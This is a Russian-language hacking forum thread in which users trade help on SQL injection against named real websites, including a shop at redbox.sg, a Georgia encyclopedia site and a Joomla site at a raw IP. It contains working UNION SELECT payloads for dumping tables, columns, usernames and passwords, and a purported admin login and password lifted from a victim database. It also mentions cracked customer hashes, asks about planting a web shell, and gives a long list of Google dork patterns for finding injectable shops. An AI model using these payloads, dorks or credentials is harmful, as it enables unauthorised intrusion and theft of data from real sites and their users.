Ваши вопросы по уязвимостям.

www.redbox.sg/products.php?cat_id=-61+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12,13,14,15,16,17,18+FROM+INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME='users'--
помогите плыз вывести столбцы

 

http://www.redbox.sg/products.php?cat_id=-61+union+select+1,2,3,concat_ws%280x3a,user_name,password%29,5,6,7,8,9,10,11,%2012,13,14,15,16,17,18+from+user--

нет там таблы users

http://www.redbox.sg/products.php?cat_id=-61+UNION+SELECT+1,2,3,%28SELECT+CONCAT%28TABLE_NAME,0x3a,TABLE_SCHEMA%29+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+106,1%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

user:bdlik_redboxx

http://www.redbox.sg/products.php?cat_id=-61+UNION+SELECT+1,2,3,%28SELECT+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x75736572+LIMIT+1,1%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

стандартная скуля с стандартным выводом, прежде чем постить всякую херню, подумай 3 раза и почитай ман по скулям...

 

о, спс, получилось,
www.redbox.sg/products.php?%20cat_id=-61+union+select%20+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,%2012,13,14,15,16,17,18+FROM%20+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x75736572--
я понял свои ошибки, только вот вопрос,
0x75736572- што ето такое? Как вы из узер получили ети символы? И почему скуль принимает только их а узер,нет?

 

клац

я вроде тебе сказал что прежде чем постить тупые вопросы почитай мануал..там есть все ответы..видимо ты из категории что в танке...это sql hex и в мануале все это описанно в деталях..сколько можно одно и тоже спрашивать..может переименовать раздел из "Ваши вопросы по уязвимостям" на "помощь школоте по раскрутке скулей "

 

ага, ок пойду почитаю,

ещо один вопрос,
узнал логин и пароЛЬ админа
name: redbox_admin
password: hooyinting
иду сюда
redbox.sg/login.php

ввожу данные, а мне пишет што непрвельный логин и пароль, почему?

 

патамушта гладиолус

 

0_о а если чесно?

 

Есть шелл www.site.com захожу через него в базу msql, www.admin.site.com возможно ли залить шелл через msql
на сайт www.admin.site.com

 

это понятно но у меня доступ к базе только через шелл(storm)

 

Извини, не понял вопрос (голова болит очень). В ПМ скинь, посмотрю.

 

Подскажите дорки для поиска шопов
кроме shop.php или buy.php

 

inurl:/catalog.php?act=1
inurl:cat=2

в гугле: интернет магазины
типа чето такого

 

inurl:"product"
inurl:"productid="
inurl:"proid="
Ну и я еще обычно юзаю filetypehp
А ваще гавно эти шопы.

 

Code:

".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="

 

redbox.sg/products.php?cat_id=-61+union+select+1,2,3,user_name,5,6,7,8,9,10,%2011,12,13,14,15,16,17,18+FROM+user--

redbox.sg/products.php?cat_id=-61+union+select+1,2,3,password,5,6,7,8,9,10,%2011,12,13,14,15,16,17,18+FROM+user--


узнал логин и пароЛЬ админа
name: redbox_admin
password: hooyinting
иду сюда
redbox.sg/login.php
ввожу данные, а мне пишет што
непрвельный логин и пароль,
почему?

 

qaz

вы могли бы заметить внизу есть кнопочка "Register a new account"

тебе это ничего не подсказывает?
это не форма авторизации для администраторов, в следующий раз будте внимательнее, чтоб не флудить в теме.

 

Как здесь крутить дальше?

http://www.georgiaencyclopedia.org/nge/Article.jsp?id=h-3434'+order+by+1+--+

 

http://www.georgiaencyclopedia.org/nge/Article.jsp?id=h-3434'+and+to_char(11)=to_char(1)||to_char(1)+--+

Oracle

http://www.georgiaencyclopedia.org/nge/Article.jsp?id=h-3434'+union+select+null+from+sys.dual+--+

дальше сам

 

Я нашел на ссайте другую таблу от оскоммерса, где нашлись мыла и хеши пассов, в т.ч:

хеш разлагается на 12345. Вбей мыло и пасс на твоей странице login.php и ты войдешь в панель клиента, но там ниче нет интересного.
Админку не нашел и таблы с админами в базе оскомерца нет, там ваще все странно.

 

Помогите пожалуйсто расскурутить blind sql на joomla

http://194.28.132.13/index.php?option=com_aardvertiser&cat_name=Equipment'+AND+'1'='1&task=view